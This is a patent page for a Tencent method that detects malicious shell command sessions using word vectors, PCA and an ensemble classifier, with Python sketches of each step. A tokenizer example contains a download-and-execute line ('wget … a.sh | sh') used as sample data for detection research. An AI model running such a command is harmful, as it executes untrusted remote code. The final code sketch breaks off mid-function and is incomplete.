CN110414229B - Operation command detection method, device, computer equipment and storage medium - Google Patents

Publication number
CN110414229B
Authority
CN
China
Prior art keywords
command
word
session
classification
vector
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201910250265.XA
Other languages
Chinese (zh)
Other versions
CN110414229A (en)
Inventor
陈洁远
关塞
于洋
曾凡
李家昌
聂利权
王伟
阮华
万志颖
李航
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Application filed by Tencent Technology Shenzhen Co Ltd
Priority to CN201910250265.XA
Publication of CN110414229A
Application granted
Publication of CN110414229B

Classifications

    • G: PHYSICS
    • G06: COMPUTING; CALCULATING OR COUNTING
    • G06F: ELECTRIC DIGITAL DATA PROCESSING
    • G06F18/00: Pattern recognition
    • G06F18/20: Analysing
    • G06F18/24: Classification techniques
    • G: PHYSICS
    • G06: COMPUTING; CALCULATING OR COUNTING
    • G06F: ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00: Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50: Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55: Detecting local intrusion or implementing counter-measures
    • G06F21/56: Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562: Static detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Computer Hardware Design (AREA)
  • Data Mining & Analysis (AREA)
  • Software Systems (AREA)
  • Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Life Sciences & Earth Sciences (AREA)
  • Artificial Intelligence (AREA)
  • Bioinformatics & Cheminformatics (AREA)
  • Bioinformatics & Computational Biology (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Evolutionary Biology (AREA)
  • Evolutionary Computation (AREA)
  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)
  • Computer And Data Communications (AREA)

Abstract

The application relates to an operation command detection method, an operation command detection device, computer equipment, and a storage medium. The method comprises: acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command; acquiring the word vector of each command word contained in the at least one operation command; acquiring a command session vector of the target command session according to the word vectors of the command words; and processing the command session vector through a classification model to obtain a classification result, wherein the classification result indicates whether the target command session contains a command of a specified type. With this scheme, a vectorized representation of commands can be learned adaptively without manual feature extraction, and commands of the specified type are identified automatically, which improves the accuracy of detecting commands of the specified type, such as malicious commands.

Description

Operation command detection method, device, computer equipment and storage medium
Technical Field
Embodiments of the application relate to the technical field of computer security, and in particular to an operation command detection method, an operation command detection device, computer equipment, and a storage medium.
Background
In the computer field, malicious commands are the terminal instructions an intruder uses when breaking into an operating system. Accurately identifying malicious commands is a pressing problem in computer security.
In the related art, an expert in computer security typically relies on personal experience to pick out important commands and compile them into an important command table. A command session is then checked against this table to determine whether it contains a malicious command.
However, this approach depends on manual experience and involves a large amount of manual feature extraction. For a new kind of malicious command, the important command table has to be rebuilt, so the approach generalizes poorly and its detection accuracy for malicious commands is low.
Disclosure of Invention
Embodiments of the application provide an operation command detection method, an operation command detection device, computer equipment, and a storage medium, which can improve the accuracy of malicious command detection. The technical scheme is as follows:
In one aspect, there is provided an operation command detection method, the method including:
acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command;
acquiring the word vector of each command word contained in the at least one operation command;
acquiring a command session vector of the target command session according to the word vectors of the command words;
processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type; the classification model is a machine learning model trained on command session samples and annotation information, and the annotation information is used for indicating whether a command session sample contains a command of the specified type.
In another aspect, there is provided an operation command detection apparatus including:
a session acquisition module, configured to acquire a target command session input in an operating system, where the target command session includes at least one operation command;
the word vector acquisition module is used for acquiring word vectors of all command words contained in the at least one operation command;
a session vector acquisition module, configured to acquire a command session vector of the target command session according to word vectors of the command words;
the classification module is used for processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type or not; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
Optionally, the session vector acquisition module is configured to,
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session;
and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
Optionally, when performing the weighted summation of the word vectors according to the frequency of occurrence of each command word in the word vector training set to obtain the command session vector of the target command session, the session vector acquisition module is configured to,
smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word;
and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
Optionally, the apparatus further includes:
a common part removal module, configured to remove the common part of the command session vector before the classification module processes the command session vector through the classification model to obtain the classification result, wherein the common part is obtained by principal component analysis;
and the classification module is configured to process, through the classification model, the command session vector from which the common part has been removed, to obtain the classification result.
Optionally, the apparatus further includes:
a replacement module, configured to replace each element of a specified type contained in the at least one operation command with a specified command word before the word vector acquisition module acquires the word vector of each command word contained in the at least one operation command.
Optionally, the specified type element includes at least one of the following type elements:
a field consisting of consecutive digits, an Internet Protocol (IP) address, and a command terminator.
Optionally, the word vector obtaining module is configured to perform a step of obtaining a word vector of each command word included in the at least one operation command when the target command session meets a filtering condition.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session contains no garbled characters, the corresponding command session has a correct source, and the acquisition time of the corresponding command session is within a specified time period.
Optionally, the classification model includes n classification sub-models, n being an integer greater than or equal to 2, and the classification module is configured to,
process the command session vector through each of the n classification sub-models to obtain the classification sub-result output by each of the n classification sub-models;
and obtain the classification result according to the classification sub-results output by the n classification sub-models.
Optionally, when obtaining the classification result according to the classification sub-results output by the n classification sub-models, the classification module is configured to,
binarize the classification sub-result output by each of the n classification sub-models to obtain n binarized values;
and take the average of the n binarized values as the classification result.
Optionally, each classification sub-result indicates the probability that the target command session contains a command of the specified type; when obtaining the classification result according to the classification sub-results output by the n classification sub-models, the classification module is configured to take the average of the probabilities indicated by the n classification sub-results as the classification result.
Optionally, the specified type of command includes a malicious command.
In another aspect, a computer device is provided, the computer device comprising a processor and a memory, the memory storing at least one instruction, at least one program, a set of codes, or a set of instructions, the at least one instruction, the at least one program, the set of codes, or the set of instructions being loaded and executed by the processor to implement the method of operation command detection as described above.
In another aspect, a computer readable storage medium is provided, the storage medium storing at least one instruction, at least one program, a code set, or an instruction set, which is loaded and executed by a processor to implement the operation command detection method described above.
The technical scheme provided by the application can comprise the following beneficial effects:
The features of each word in an operation command are represented by a word vector, the command session vector of the target command session is generated from the word vectors, and the command session vector together with a trained classification model is used to detect whether the target command session contains a command of a specified type (such as a malicious command). The scheme requires no manual feature extraction: it adaptively learns a vectorized representation of commands and automatically identifies commands of the specified type, thereby improving the detection accuracy for commands of the specified type, such as malicious commands.
It is to be understood that both the foregoing general description and the following detailed description are exemplary and explanatory only and are not restrictive of the application as claimed.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the application and together with the description, serve to explain the principles of the application.
FIG. 1 is a schematic diagram of an operation command detection system according to an exemplary embodiment;
FIG. 2 is a flowchart illustrating a method of operation command detection, according to an example embodiment;
FIG. 3 is a flowchart illustrating detection of a command of a specified type according to the embodiment shown in FIG. 2;
FIG. 4 is a flowchart illustrating a method of operation command detection, according to an example embodiment;
FIG. 5 is a flowchart illustrating malicious command detection according to an exemplary embodiment;
FIG. 6 is a block diagram showing the structure of an operation command detection apparatus according to an exemplary embodiment;
FIG. 7 is a schematic diagram of a computer device according to an exemplary embodiment.
Detailed Description
Reference will now be made in detail to exemplary embodiments, examples of which are illustrated in the accompanying drawings. When the following description refers to the accompanying drawings, the same numbers in different drawings refer to the same or similar elements, unless otherwise indicated. The implementations described in the following exemplary examples do not represent all implementations consistent with the application. Rather, they are merely examples of apparatus and methods consistent with aspects of the application as detailed in the accompanying claims.
Embodiments of the application provide an operation command detection scheme that detects malicious commands more accurately. To aid understanding, several terms used in the application are explained below.
1) Word vector
In natural language processing (NLP), each word in a sentence is mapped to a high-dimensional vector to facilitate subsequent computation; the vector corresponding to a word is its word vector.
2) Command session vector
A command session typically contains multiple commands. In the embodiments of the application, each command can be regarded as a sentence made up of several words, so the whole command session can be mapped to a high-dimensional vector; the vector to which the whole command session is mapped is the command session vector.
Fig. 1 is a schematic diagram showing the structure of an operation command detection system according to an exemplary embodiment. The system comprises a detection device 120 and several terminals 140.
The detection device 120 may be a computer device (such as a server), or a computing cluster formed by a plurality of computer devices, or a virtualization platform, or a cloud computing service center.
The terminal 140 may be a terminal device on which an operating system (such as a Unix, Linux, or Windows system) is installed and which can perform operations according to an input command session. For example, the terminal 140 may be a desktop computer, a laptop (notebook) computer, a mobile phone, a tablet, an e-book reader, smart glasses, a smart watch, an MP3 (Moving Picture Experts Group Audio Layer III) player, an MP4 (Moving Picture Experts Group Audio Layer IV) player, and so on.
The terminal 140 is connected to the detection device 120 through a communication network. Optionally, the communication network is a wired network or a wireless network.
Optionally, the system may further include a management device 160, where the management device 160 is connected to the detection device 120 through a communication network. Optionally, the communication network is a wired network or a wireless network.
Optionally, the wireless network or wired network described above uses standard communication techniques and/or protocols. The network is typically the Internet, but may be any network, including but not limited to a local area network (LAN), a metropolitan area network (MAN), a wide area network (WAN), a mobile, wired, or wireless network, a private network, a virtual private network, or any combination of these. In some embodiments, data exchanged over the network is represented using techniques and/or formats including HyperText Markup Language (HTML), Extensible Markup Language (XML), and the like. All or some of the links may also be encrypted using conventional encryption techniques such as Secure Sockets Layer (SSL), Transport Layer Security (TLS), virtual private network (VPN), Internet Protocol Security (IPsec), and the like. In other embodiments, custom and/or dedicated data communication techniques may be used in place of or in addition to those described above.
Fig. 2 is a flow chart illustrating an operation command detection method that may be used in a computer device, such as the detection device 120 of the system shown in fig. 1 described above, or other computer devices (such as a desktop, notebook, personal workstation, or other server), according to an exemplary embodiment. As shown in fig. 2, the operation command detection method may include the steps of:
Step 21, acquiring a target command session input in the operating system, wherein the target command session contains at least one operation command.
Step 22, obtaining the word vector of each command word contained in the at least one operation command.
Step 23, obtaining the command session vector of the target command session according to the word vectors of the command words.
Step 24, processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type.
The classification model is a machine learning model obtained through training of a command session sample and annotation information, wherein the annotation information is used for indicating whether the command session sample contains the specified type of command.
In natural language processing, the main objects of processing are words made up of characters. A computer cannot operate on characters directly, so such words must be converted into an encoding the computer can process. Representing each word as a multi-dimensional vector is a common way of encoding text in natural language processing.
The scheme of the application constructs a word vector for each command word in the command session and derives a command session vector from those word vectors, so that the command session is represented as a vector. The command session vector is then processed by a pre-trained machine learning model to detect commands of the specified type in the command session. For example, refer to Fig. 3, which shows a flowchart of detecting a command of a specified type according to an embodiment of the application. As shown in Fig. 3, the detection device stores a classification model 34 in advance. The classification model 34 is trained on command session samples 36 and the annotation information 37 corresponding to the command session samples 36; the training may be carried out on the detection device or on another computer device. For a target command session 31, the detection device first acquires the word vector 32 of each command word in the target command session 31, then generates the command session vector 33 from the word vectors 32, and then inputs the command session vector 33 into the pre-trained classification model 34, which processes it and outputs a classification result 35. If the classification result 35 indicates that the target command session 31 contains a command of the specified type, the detection device may present a corresponding prompt. For example, when the specified type of command is a malicious command and the classification result 35 indicates that the target command session 31 contains a malicious command, the detection device may issue a warning.
The scheme provided by the embodiments of the application performs feature extraction and classification by machine learning. It requires no manual feature extraction, adaptively learns a vectorized representation of commands, and automatically recognizes commands of the specified type, thereby improving the detection accuracy for commands of the specified type, such as malicious commands.
Fig. 4 is a flowchart illustrating an operation command detection method according to an exemplary embodiment, which may be applied to a computer device, such as the detection device 120 of the system shown in fig. 1 described above, or other computer devices (such as a desktop computer, a notebook computer, a personal workstation, or other servers). As shown in fig. 4, the operation command detection method may include the steps of:
Step 401, obtaining a target command session input in an operating system, where the target command session includes at least one operation command.
In the embodiment of the application, the detection device can periodically acquire each command session received by each terminal in the system, wherein each command session consists of a plurality of operation commands, and each operation command contains one or more command words.
In the embodiment of the application, the command word can be a word, a punctuation mark, a special symbol and the like contained in a command.
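As a rough illustration of how a command session might be broken into operation commands and command words, here is a minimal sketch. The source does not specify a tokenization rule, so the regular expression, the one-command-per-line assumption, and the function names `split_session` and `tokenize_command` are all hypothetical.

```python
import re
from typing import List

# Assumed rule: a run of letters, digits, or common path/option characters is
# one command word; any other non-space character is a command word by itself.
_TOKEN_RE = re.compile(r"[A-Za-z0-9_./-]+|[^\sA-Za-z0-9_./-]")


def split_session(session: str) -> List[str]:
    """Split a command session into operation commands (assumed one per line)."""
    return [line.strip() for line in session.splitlines() if line.strip()]


def tokenize_command(command: str) -> List[str]:
    """Split one operation command into command words."""
    return _TOKEN_RE.findall(command)


session = "cd /tmp\nwget http://example.com/a.sh | sh"
commands = split_session(session)
words = [tokenize_command(c) for c in commands]
```

Punctuation such as `|` or `:` becomes a command word in its own right, which matches the statement that punctuation marks and special symbols count as command words.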
Step 402, replacing the specified type element contained in the at least one operation command with a specified command word.
Optionally, the specified type element includes at least one of the following: a field consisting of consecutive digits, an Internet Protocol (IP) address, and a command terminator.
Compared with natural language, operation commands are more flexible and contain more custom commands and parameters, and different custom commands or parameters often carry similar information. To keep these custom commands and parameters from affecting the subsequent detection result, in the embodiments of the application the custom commands or parameters in the operation commands of each command session can be preprocessed, which improves the accuracy of subsequent recognition.
This preprocessing may consist of replacing custom commands or parameters of the same type (whose content may differ) with the same command word.
For example, the detection device may replace all fields composed of consecutive digits in the operation command with the same special symbol (e.g., word sign), replace all IP addresses in the operation command with the same special symbol (e.g., word sign), and replace all command terminators in the operation command with the same special symbol (e.g., word sign).
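The replacement step could look something like the sketch below. The placeholder tokens `<NUM>`, `<IP>`, and `<END>`, the use of one distinct token per element type, and the choice of `;` and `&&` as command terminators are assumptions made for illustration; the source only says that elements of the same type are replaced with the same special symbol.

```python
import re

# Hypothetical placeholder command words, one per element type.
NUM_TOKEN, IP_TOKEN, END_TOKEN = "<NUM>", "<IP>", "<END>"

_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")  # dotted-quad IPv4 only
_NUM_RE = re.compile(r"\b\d+\b")                     # standalone digit runs
_END_RE = re.compile(r";|&&")                        # assumed terminators


def normalize_command(command: str) -> str:
    """Replace IP addresses, digit fields, and terminators with placeholders."""
    # IP addresses go first so their octets are not rewritten as numbers.
    command = _IP_RE.sub(IP_TOKEN, command)
    command = _NUM_RE.sub(NUM_TOKEN, command)
    command = _END_RE.sub(f" {END_TOKEN} ", command)
    # Collapse the extra whitespace introduced around the terminator token.
    return " ".join(command.split())


normalized = normalize_command("ssh root@10.0.0.5 -p 2222; kill 4312")
```

After this step, two commands that differ only in a port number or a target address normalize to the same string, so they share the same command words.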
Step 403, obtaining word vectors of command words contained in the at least one operation command.
Optionally, the step of obtaining the word vector of each command word contained in the at least one operation command is performed when the target command session meets a filtering condition.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session contains no garbled characters, the corresponding command session has a correct source, and the acquisition time of the corresponding command session is within a specified time period.
When acquiring command sessions, the detection device may fail to acquire some of them correctly. In the embodiments of the application, therefore, before any further recognition is performed, the command sessions that were not acquired, or not acquired correctly, can be filtered out. The filtering process may be as follows:
1) Filter out command sessions that contain garbled characters.
When a command session is acquired incorrectly, garbled characters may appear in it, indicating that some or all of its command words were not acquired correctly. In this case the detection device may discard any command session containing garbled characters, or discard any command session whose garbled-character ratio exceeds a preset ratio threshold. The garbled-character ratio may be the number of garbled characters in the command session divided by the total number of characters in the command session.
2) Filter out command sessions that do not have a correct source.
In the embodiments of the application, the detection device may detect command sessions from one or more specified terminals. Before performing the subsequent steps, the detection device therefore first determines whether each acquired command session has a correct command source (i.e., which terminal it came from). If the source of a command session is not one of the specified terminals, or if a command session has no command source, the detection device may discard that command session.
3) Filter out command sessions whose acquisition time is not within a specified time period.
In the embodiments of the application, the detection device may detect command sessions in time slices. For example, every 24 hours the detection device checks the command sessions entered on the terminals during the preceding 24 hours. Before performing the subsequent steps, the detection device therefore first determines whether each acquired command session was acquired within the 24 hours before the current time. If the acquisition time of a command session is not within the 24 hours before the current time, or if a command session has no corresponding acquisition time, the detection device may discard that command session.
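The three filtering conditions above can be sketched as a single predicate. How garbled characters are recognized is not stated in the source; treating the Unicode replacement character and non-printable characters as garbled is an assumption here, as are the names `garbled_ratio` and `passes_filters` and the parameter layout.

```python
from datetime import datetime, timedelta
from typing import Optional, Set


def garbled_ratio(text: str) -> float:
    """Garbled characters divided by total characters (empty text counts as garbled)."""
    if not text:
        return 1.0
    bad = sum(
        1 for ch in text
        if ch == "\ufffd" or not (ch.isprintable() or ch in "\n\t")
    )
    return bad / len(text)


def passes_filters(
    text: str,
    source: Optional[str],
    acquired_at: Optional[datetime],
    allowed_sources: Set[str],
    now: datetime,
    max_garbled: float = 0.0,
    window: timedelta = timedelta(hours=24),
) -> bool:
    """Return True only if the session survives all three filters."""
    if garbled_ratio(text) > max_garbled:           # 1) garbled characters
        return False
    if source is None or source not in allowed_sources:  # 2) source
        return False
    if acquired_at is None or not (now - window <= acquired_at <= now):  # 3) time
        return False
    return True


now = datetime(2019, 3, 29, 12, 0, 0)
ok = passes_filters("ls -la", "host-a", now - timedelta(hours=1), {"host-a"}, now)
```

With `max_garbled=0.0` any garbled character causes the session to be discarded; a larger value corresponds to the ratio-threshold variant.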
In the embodiments of the application, the detection device may perform word segmentation on each command session and train word vectors on the segmentation result. That is, a word vector training set containing the command words of every command session is generated from the command sessions, and the training set is fed to a preset word vector training model to obtain the word vector of each command word in the training set.
Optionally, after the word vectors are trained, the detection device may filter the command words in the word vector training set to remove rarely occurring command words, for example those that occur fewer times than a preset count threshold.
When training word vectors on the word vector training set, the training device may use a word2vec model. Word2vec learns semantic knowledge from a large amount of text in an unsupervised manner. In essence, it learns from text to represent the semantic information of words as word vectors, using an embedding space in which semantically similar words lie close together; that is, words are mapped from the space they originally belong to into a new multi-dimensional space.
The training device may be the detection device or a device other than the detection device.
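The bookkeeping around word vector training in step 403 (counting command words, dropping rare ones, and recording relative frequencies for later weighting) can be sketched as follows. The word2vec training itself is omitted. The function name `build_vocabulary`, the default threshold of 2, and the choice to compute frequencies over all tokens are assumptions.

```python
from collections import Counter
from typing import Dict, List, Tuple


def build_vocabulary(
    tokenized_sessions: List[List[str]], min_count: int = 2
) -> Tuple[Dict[str, int], Dict[str, float]]:
    """Count command words, drop rare ones, and compute relative frequencies."""
    counts = Counter(w for session in tokenized_sessions for w in session)
    total = sum(counts.values())
    # Keep only command words that occur at least min_count times.
    kept = {w: c for w, c in counts.items() if c >= min_count}
    # Relative frequency of each kept word among all tokens (an assumption).
    freqs = {w: c / total for w, c in kept.items()}
    return kept, freqs


sessions = [["ls", "-la"], ["ls", "/tmp"], ["cat", "/tmp"]]
kept, freqs = build_vocabulary(sessions, min_count=2)
```

The `freqs` mapping is the kind of per-word frequency that the weighted summation in step 404 relies on.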
Step 404, obtaining the command session vector of the target command session according to the word vector of each command word.
Optionally, when obtaining the command session vector of the target command session according to the word vector of each command word, the detection device may obtain frequencies of occurrence of each command word in a word vector training set, where the word vector training set is a set of word vectors for training the command session; and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
In the embodiment of the application, the detection device can directly take the frequency corresponding to the command word as the weight of the command word, or the detection device can also obtain the weight corresponding to the command word according to the frequency corresponding to the command word and combining a preset weight calculation method.
Optionally, when the word vectors of the command words are weighted and summed according to the frequencies of occurrence of the command words in the word vector training set, respectively, to obtain the command session vector of the target command session, the detection device may perform smoothing processing on the inverse frequencies corresponding to the frequencies of occurrence of the command words in the word vector training set, respectively, to obtain weights corresponding to the command words, respectively; and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
For example, in the embodiment of the present application, the detection device may perform smoothing on the inverse of the frequency of the command word (i.e., the inverse frequency) to obtain the weight corresponding to the command word. For example, for the target command word, the detection device may divide the smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word, and take the obtained result as the weight of the target command word.
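As a non-limiting illustration, the weight calculation and weighted summation described above may be sketched in Python as follows. The function names, the use of relative frequency (count divided by total word count), the default smoothing coefficient, and the skipping of words without a word vector are assumptions made for this sketch only.

```python
from collections import Counter


def word_frequencies(training_sessions):
    """Relative frequency of each command word over the whole training set."""
    counts = Counter(w for session in training_sessions for w in session)
    total = sum(counts.values())
    return {w: c / total for w, c in counts.items()}


def smoothed_weight(freq, a=1e-3):
    """Smoothing coefficient divided by (smoothing coefficient + frequency)."""
    return a / (a + freq)


def session_vector(words, word_vectors, freqs, a=1e-3):
    """Weighted sum of the word vectors of the command words in one session."""
    dim = len(next(iter(word_vectors.values())))
    total = [0.0] * dim
    for w in words:
        if w not in word_vectors:
            continue  # assumption: words without a trained vector are skipped
        weight = smoothed_weight(freqs.get(w, 0.0), a)
        for k, x in enumerate(word_vectors[w]):
            total[k] += weight * x
    return total
```

With this weighting, a command word that occurs very frequently in the training set contributes less to the command session vector than a rare one.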
Step 405, removing the common part in the command session vector, where the common part is obtained by means of principal component analysis.
In the embodiment of the application, the detection device can perform common part rejection on the command session vector corresponding to each command session to remove the common part in the command session vector corresponding to each command session, wherein the common part can be obtained by a principal component analysis (Principal Component Analysis, PCA) mode.
Step 406, processing the command session vector from which the common part has been removed through a classification model to obtain a classification result, where the classification result is used to indicate whether the target command session includes a command of a specified type.
The classification model is a machine learning model obtained through training of a command session sample and annotation information, wherein the annotation information is used for indicating whether the command session sample contains the specified type of command.
Optionally, the classification model includes n classification sub-models, n is an integer greater than or equal to 2, and when the command session vector is processed through the classification model to obtain a classification result, the detection device can respectively process the command session vector through the n classification sub-models to obtain classification sub-results respectively output by the n classification sub-models; and obtaining the classification result according to the classification sub-results output by the n classification sub-models.
In one example, when obtaining the classification result from the classification sub-results output by the n classification sub-models, the detection device may binarize the classification sub-results output by the n classification sub-models to obtain n binarized values, and take the average value of the n binarized values as the classification result.
Or, in another example, the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the detection device may acquire, as the classification result, an average value of probabilities indicated by the respective n classification sub-models when the classification result is acquired from the classification sub-results output by the respective n classification sub-models.
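The two ways of combining the classification sub-results described above may be sketched as follows. This is a minimal illustration; the function names and the binarization threshold of 0.5 are assumptions of the sketch and are not fixed by the embodiment.

```python
def fuse_by_binarization(sub_results, threshold=0.5):
    """Binarize each sub-model output, then average the n binarized values."""
    binary = [1 if r > threshold else 0 for r in sub_results]
    return sum(binary) / len(binary)


def fuse_by_probability(sub_probabilities):
    """Average the probabilities indicated by the n classification sub-models."""
    return sum(sub_probabilities) / len(sub_probabilities)
```

For example, for three sub-models that output 0.9, 0.6 and 0.1, the first function returns 2/3 (two of the three binarized values are 1), while the second returns the mean of the three probabilities.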
Optionally, the detection device may further display a prompt message according to the classification result output by the classification model, so as to prompt whether the target command session includes the specified type of command.
For example, when the classification result indicates that the target command session contains a malicious command, the detection device may display a reminder, where the reminder is used to prompt that the target command session contains a malicious command, so that a manager can make corresponding processing in time.
In summary, according to the scheme provided by the embodiment of the application, the characteristics of each word in the operation command are represented by the word vector, the command session vector of the target command session is generated based on the word vector, and whether the target command session contains the specified type command (such as the malicious command) is detected by the command session vector and the trained classification model.
Taking the case where the specified type of command is a malicious command as an example, please refer to fig. 5, which is a flowchart illustrating malicious command detection according to an exemplary embodiment. Taking malicious command detection on the command sessions received by each terminal in a local area network as an example, as shown in fig. 5, the malicious command detection process may be as follows:
S1, acquiring a command session.
The detection device can collect command sessions input in each terminal in the current local area network, and sort and store the collected command sessions according to time so as to detect malicious commands periodically.
For example, the detection device may perform malicious command detection every 24 hours, and when performing malicious command detection, the detection device may acquire each command session collected and stored in the last 24 hours.
S2, command preprocessing.
This step mainly comprises the following two steps:
1) Filtering dirty data;
In the embodiment of the application, dirty data filtering refers to filtering out incorrectly collected command data from the collected command sessions, for example: command sessions containing garbled characters (or command sessions in which the proportion of garbled characters is larger than a preset proportion threshold), command sessions with an incorrect source, command sessions with no source, command sessions whose collection time is not within the last 24 hours, command sessions with no collection time, and the like.
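A minimal sketch of such a dirty data filter is given below. The record layout (`CommandSession`), the way garbled characters are detected (the Unicode replacement character or non-printable characters), the set of known sources, and the default thresholds are all hypothetical choices made for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class CommandSession:
    text: str
    source: Optional[str]
    collected_at: Optional[datetime]


def garbled_ratio(text):
    """Share of characters that look garbled; empty text counts as fully garbled."""
    if not text:
        return 1.0
    bad = sum(
        1 for ch in text
        if ch == "\ufffd" or not (ch.isprintable() or ch in "\r\n\t")
    )
    return bad / len(text)


def is_clean(session, known_sources, now, max_garbled=0.0,
             window=timedelta(hours=24)):
    """Return True only if the session passes every filtering condition."""
    if garbled_ratio(session.text) > max_garbled:
        return False  # too many garbled characters
    if session.source is None or session.source not in known_sources:
        return False  # missing or incorrect source
    if session.collected_at is None:
        return False  # missing collection time
    age = now - session.collected_at
    return timedelta(0) <= age <= window  # collected within the last 24 hours
```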
2) Symbol replacement;
In the embodiment of the application, symbol replacement may refer to applying the following replacements to a command session after dirty data filtering:
a) All runs of consecutive digits are replaced with a special symbol;
b) All IP addresses are replaced with the special symbol SIGNIP;
c) The end of each command line in the command session is replaced with a special symbol.
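The three replacements may be sketched with regular expressions as follows. Only the token SIGNIP appears in the text; the tokens `SIGNNUM` and `SIGNEOL`, the restriction to dotted IPv4 addresses, and the function name are assumptions of this sketch. IP addresses are replaced before digit runs so that an address is not broken up into separate numbers.

```python
import re

# Assumption: only dotted-quad IPv4 addresses are recognised.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
NUM_RE = re.compile(r"\d+")


def replace_symbols(session_text, num_token="SIGNNUM", ip_token="SIGNIP",
                    eol_token="SIGNEOL"):
    """Apply replacements a) to c) to every command line of a session."""
    lines = []
    for line in session_text.splitlines():
        line = IP_RE.sub(ip_token, line)    # b) IP addresses first
        line = NUM_RE.sub(num_token, line)  # a) remaining runs of digits
        lines.append(f"{line} {eol_token}")  # c) mark the end of the line
    return "\n".join(lines)
```

For example, the session text `ssh root@10.0.0.1 -p 22` followed by a second line `sleep 5` becomes `ssh root@SIGNIP -p SIGNNUM SIGNEOL` and `sleep SIGNNUM SIGNEOL`.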
S3, extracting command word vectors.
The extraction of the command word vector comprises two steps:
a) Word segmentation;
To make better use of all the data and the context when learning word vectors, word segmentation not only uses spaces as separators between words but also treats punctuation marks and special symbols as separate words. For example, the file path /etc/hots is divided into four words: /, etc, /, hots.
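One possible way to implement this word segmentation is a single regular expression that matches either a run of word characters or one punctuation or special character. The function name and the exact character classes are assumptions of this sketch.

```python
import re

# A token is either a run of word characters or a single non-space symbol.
TOKEN_RE = re.compile(r"\w+|[^\w\s]")


def segment(command):
    """Split a command on whitespace and keep each symbol as its own word."""
    return TOKEN_RE.findall(command)
```

With this sketch, `segment("cat /etc/hots")` yields the words `cat`, `/`, `etc`, `/`, `hots`.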
b) Training word vectors;
To reduce the influence of various custom parameters and file names on the model, words that occur infrequently are filtered out first. There are many methods for training word vectors; this scheme uses the skip-gram model in Word2Vec. For example, the word vector dimension may be 200 and the window size may be 10.
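The filtering of infrequent words and the construction of skip-gram training pairs may be illustrated as follows. The sketch only prepares the training data and does not train a model; the function names, the minimum count of 2, and the `half_window` parameter (the number of words taken on each side of the center word) are assumptions.

```python
from collections import Counter


def filter_rare_words(sessions, min_count=2):
    """Drop words that occur fewer than min_count times in the training set."""
    counts = Counter(w for s in sessions for w in s)
    return [[w for w in s if counts[w] >= min_count] for s in sessions]


def skipgram_pairs(words, half_window):
    """List (center word, context word) pairs within the window of each word."""
    pairs = []
    for t, center in enumerate(words):
        lo = max(0, t - half_window)
        hi = min(len(words), t + half_window + 1)
        for j in range(lo, hi):
            if j != t:
                pairs.append((center, words[j]))
    return pairs
```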
The principle of the skip-gram model is as follows. Assume that the current word in the sentence is $w_t$, and that the words within a window of length $2L$ before and after $w_t$ are $w_{t-L},\dots,w_{t-1},w_{t+1},\dots,w_{t+L}$. The goal of the model is then to maximize the joint probability of the context of $w_t$ occurring:
$$\prod_{i} p(w_{t+i}\mid w_t),\quad i\in[-L,L]\ \text{and}\ i\neq 0;$$
the probability of a single word is calculated as follows:
$$p(w_O\mid w_I)=\frac{\exp\left({v'_{w_O}}^{\top}v_{w_I}\right)}{\sum_{w}\exp\left({v'_{w}}^{\top}v_{w_I}\right)}$$
where $v_w$ is the input vector representation of word $w$, $v'_w$ is the output vector representation of word $w$, and the sum runs over all words in the vocabulary. That is, the same word is represented by its input vector when it is the window-center word $w_t$, and by its output vector when it is the predicted word.
The training process takes the input and output vectors of every word as parameters and finds the vectors that maximize the average log probability over the corpus, where $T$ is the number of words in the corpus, namely:
$$\frac{1}{T}\sum_{t=1}^{T}\ \sum_{-L\le i\le L,\ i\neq 0}\log p(w_{t+i}\mid w_t)$$
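For illustration, in the standard skip-gram formulation the probability of a context word given the center word is a softmax over the dot products of output vectors with the input vector of the center word. The sketch below computes this probability for small dictionaries of vectors; the function name and the dictionary layout are assumptions, and practical word2vec implementations usually approximate this full softmax rather than evaluate it directly.

```python
import math


def context_probability(center, context, v_in, v_out):
    """Softmax probability of `context` given `center`.

    v_in maps each word to its input vector, v_out to its output vector.
    """
    def dot(a, b):
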